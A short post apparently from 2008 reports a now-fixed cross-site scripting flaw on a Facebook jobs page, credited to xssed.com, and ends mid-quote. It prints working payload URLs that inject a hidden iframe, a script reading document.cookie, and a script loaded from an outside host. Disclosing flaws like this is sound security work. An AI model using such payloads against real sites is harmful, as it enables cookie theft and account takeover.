Facebook Hack: XSS Vulnerability (fixed on the 23/05/2008)
This new vulnerability uses a XSS (Cross-Site Scripting) technique to obtain sensitive information from Facebook users and even allows to execute malicious script code on the user computer.
xssed.com who announced (author: Mox) that vulnerability give you good samples of how it works.
Redirection sample:
http://www.xssed.com/mirror/34274/
or
Insertion in a hidden iframe:
http://www.facebook.com/jobs/position.php?st=%22%3E%3Ciframe%20src=http://xssed.com%3E%3C/iframe%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://www.facebook.com/jobs/position.php?st=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E
According to Dimitris Pagkalos from xssed.com:
“I’m quite sure there […]